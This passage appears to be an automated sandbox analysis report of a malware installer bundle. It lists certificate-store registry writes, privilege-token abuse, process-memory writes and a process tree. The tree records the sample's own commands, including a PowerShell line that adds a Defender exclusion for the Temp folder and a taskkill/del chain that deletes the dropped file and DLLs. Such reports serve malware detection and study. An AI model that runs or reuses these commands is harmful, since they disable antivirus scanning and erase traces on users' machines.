5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun05ac1b0207d3ff3b8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Runs net.exe
-
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 144 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 79 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Sun05532f7abc.exepowershell.exeExplorer.EXEbrowser_broker.exeWerFault.exeWerFault.exepid process 688 Sun05532f7abc.exe 688 Sun05532f7abc.exe 732 powershell.exe 3052 Explorer.EXE 3052 Explorer.EXE 732 browser_broker.exe 732 browser_broker.exe 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 4888 WerFault.exe 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 4888 WerFault.exe 4888 WerFault.exe 3052 Explorer.EXE 3052 Explorer.EXE 4176 WerFault.exe 4176 WerFault.exe 4176 WerFault.exe 4176 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3052 Explorer.EXE -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 620 620 -
Suspicious behavior: MapViewOfSection 20 IoCs
Processes:
Sun05532f7abc.exeMicrosoftEdgeCP.exeesvdijbesvdijbesvdijbpid process 688 Sun05532f7abc.exe 7152 MicrosoftEdgeCP.exe 7152 MicrosoftEdgeCP.exe 212 esvdijb 7152 MicrosoftEdgeCP.exe 7152 MicrosoftEdgeCP.exe 7152 MicrosoftEdgeCP.exe 7152 MicrosoftEdgeCP.exe 7152 MicrosoftEdgeCP.exe 7152 MicrosoftEdgeCP.exe 6308 esvdijb 7152 MicrosoftEdgeCP.exe 7152 MicrosoftEdgeCP.exe 7152 MicrosoftEdgeCP.exe 7152 MicrosoftEdgeCP.exe 4752 esvdijb 7152 MicrosoftEdgeCP.exe 7152 MicrosoftEdgeCP.exe 7152 MicrosoftEdgeCP.exe 7152 MicrosoftEdgeCP.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes:
4438404.exepid process 1044 4438404.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Sun05d60bc3b96248e5.exeSun059375dac544fc4a.exeSun050462125c7d35.exepowershell.exe4078089.exe2.exePublicDwlBrowser1100.exe7679190.exeExplorer.EXE2195400.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeBearVpn 3.exeWerFault.exeWerFault.exeWerFault.exe7844654.exeWerFault.exeJypebapezhe.exedescription pid process Token: SeCreateTokenPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeAssignPrimaryTokenPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeLockMemoryPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeIncreaseQuotaPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeMachineAccountPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeTcbPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeSecurityPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeTakeOwnershipPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeLoadDriverPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeSystemProfilePrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeSystemtimePrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeProfSingleProcessPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeIncBasePriorityPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeCreatePagefilePrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeCreatePermanentPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeBackupPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeRestorePrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeShutdownPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeDebugPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeAuditPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeSystemEnvironmentPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeChangeNotifyPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeRemoteShutdownPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeUndockPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeSyncAgentPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeEnableDelegationPrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeManageVolumePrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeImpersonatePrivilege 3196 Sun05d60bc3b96248e5.exe Token: SeCreateGlobalPrivilege 3196 Sun05d60bc3b96248e5.exe Token: 31 3196 Sun05d60bc3b96248e5.exe Token: 32 3196 Sun05d60bc3b96248e5.exe Token: 33 3196 Sun05d60bc3b96248e5.exe Token: 34 3196 Sun05d60bc3b96248e5.exe Token: 35 3196 Sun05d60bc3b96248e5.exe Token: SeDebugPrivilege 3168 Sun059375dac544fc4a.exe Token: SeDebugPrivilege 3768 Sun050462125c7d35.exe Token: SeDebugPrivilege 732 powershell.exe Token: SeDebugPrivilege 2308 4078089.exe Token: SeDebugPrivilege 4100 2.exe Token: SeDebugPrivilege 3760 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 4312 7679190.exe Token: SeShutdownPrivilege 3052 Explorer.EXE Token: SeCreatePagefilePrivilege 3052 Explorer.EXE Token: SeShutdownPrivilege 3052 Explorer.EXE Token: SeCreatePagefilePrivilege 3052 Explorer.EXE Token: SeShutdownPrivilege 3052 Explorer.EXE Token: SeCreatePagefilePrivilege 3052 Explorer.EXE Token: SeDebugPrivilege 4644 2195400.exe Token: SeRestorePrivilege 4904 WerFault.exe Token: SeBackupPrivilege 4904 WerFault.exe Token: SeBackupPrivilege 4904 WerFault.exe Token: SeDebugPrivilege 4888 WerFault.exe Token: SeDebugPrivilege 4176 WerFault.exe Token: SeDebugPrivilege 4904 WerFault.exe Token: SeDebugPrivilege 5084 WerFault.exe Token: SeDebugPrivilege 4284 BearVpn 3.exe Token: SeDebugPrivilege 4576 WerFault.exe Token: SeDebugPrivilege 768 WerFault.exe Token: SeShutdownPrivilege 3052 Explorer.EXE Token: SeCreatePagefilePrivilege 3052 Explorer.EXE Token: SeDebugPrivilege 3628 WerFault.exe Token: SeDebugPrivilege 4752 7844654.exe Token: SeDebugPrivilege 1328 WerFault.exe Token: SeDebugPrivilege 5116 Jypebapezhe.exe -
Suspicious use of FindShellTrayWindow 17 IoCs
Processes:
Explorer.EXEsetup_2.tmpultramediaburner.tmpinstaller.exepid process 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 4772 setup_2.tmp 5248 ultramediaburner.tmp 5656 installer.exe 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE 3052 Explorer.EXE -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
Explorer.EXEMicrosoftEdge.execmd.exeMicrosoftEdgeCP.exepid process 3052 Explorer.EXE 3292 MicrosoftEdge.exe 6292 cmd.exe 7152 MicrosoftEdgeCP.exe 7152 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 636 wrote to memory of 1004 636 setup_x86_x64_install.exe setup_installer.exe PID 636 wrote to memory of 1004 636 setup_x86_x64_install.exe setup_installer.exe PID 636 wrote to memory of 1004 636 setup_x86_x64_install.exe setup_installer.exe PID 1004 wrote to memory of 1252 1004 setup_installer.exe setup_install.exe PID 1004 wrote to memory of 1252 1004 setup_installer.exe setup_install.exe PID 1004 wrote to memory of 1252 1004 setup_installer.exe setup_install.exe PID 1252 wrote to memory of 2540 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 2540 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 2540 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 2560 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 2560 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 2560 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 2708 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 2708 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 2708 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 2732 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 2732 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 2732 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 3060 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 3060 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 3060 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 3764 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 3764 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 3764 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 4000 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 4000 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 4000 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 3628 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 3628 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 3628 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 3800 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 3800 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 3800 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 4060 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 4060 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 4060 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 504 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 504 1252 setup_install.exe cmd.exe PID 1252 wrote to memory of 504 1252 setup_install.exe cmd.exe PID 3060 wrote to memory of 3032 3060 cmd.exe Sun05640630a6aa.exe PID 3060 wrote to memory of 3032 3060 cmd.exe Sun05640630a6aa.exe PID 3060 wrote to memory of 3032 3060 cmd.exe Sun05640630a6aa.exe PID 2732 wrote to memory of 688 2732 cmd.exe Sun05532f7abc.exe PID 2732 wrote to memory of 688 2732 cmd.exe Sun05532f7abc.exe PID 2732 wrote to memory of 688 2732 cmd.exe Sun05532f7abc.exe PID 2540 wrote to memory of 732 2540 cmd.exe powershell.exe PID 2540 wrote to memory of 732 2540 cmd.exe powershell.exe PID 2540 wrote to memory of 732 2540 cmd.exe powershell.exe PID 2708 wrote to memory of 4092 2708 cmd.exe Sun052bbd8bebd9.exe PID 2708 wrote to memory of 4092 2708 cmd.exe Sun052bbd8bebd9.exe PID 2708 wrote to memory of 4092 2708 cmd.exe Sun052bbd8bebd9.exe PID 2560 wrote to memory of 1912 2560 cmd.exe Sun05ac1b0207d3ff3b8.exe PID 2560 wrote to memory of 1912 2560 cmd.exe Sun05ac1b0207d3ff3b8.exe PID 2560 wrote to memory of 1912 2560 cmd.exe Sun05ac1b0207d3ff3b8.exe PID 4000 wrote to memory of 3196 4000 cmd.exe Sun05d60bc3b96248e5.exe PID 4000 wrote to memory of 3196 4000 cmd.exe Sun05d60bc3b96248e5.exe PID 4000 wrote to memory of 3196 4000 cmd.exe Sun05d60bc3b96248e5.exe PID 3764 wrote to memory of 3168 3764 cmd.exe Sun059375dac544fc4a.exe PID 3764 wrote to memory of 3168 3764 cmd.exe Sun059375dac544fc4a.exe PID 3800 wrote to memory of 3728 3800 cmd.exe Sun05899db881f67fb29.exe PID 3800 wrote to memory of 3728 3800 cmd.exe Sun05899db881f67fb29.exe PID 3628 wrote to memory of 3768 3628 cmd.exe Sun050462125c7d35.exe PID 3628 wrote to memory of 3768 3628 cmd.exe Sun050462125c7d35.exe PID 504 wrote to memory of 3884 504 cmd.exe Sun05fa3b4d2ae56e.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05ac1b0207d3ff3b8.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun05ac1b0207d3ff3b8.exeSun05ac1b0207d3ff3b8.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Sun05ac1b0207d3ff3b8.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun05ac1b0207d3ff3b8.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Sun05ac1b0207d3ff3b8.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun052bbd8bebd9.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun052bbd8bebd9.exeSun052bbd8bebd9.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05532f7abc.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun05532f7abc.exeSun05532f7abc.exe6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun05640630a6aa.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun05640630a6aa.exeSun05640630a6aa.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun059375dac544fc4a.exe5⤵
- Suspicious use of WriteProcessMemory
-
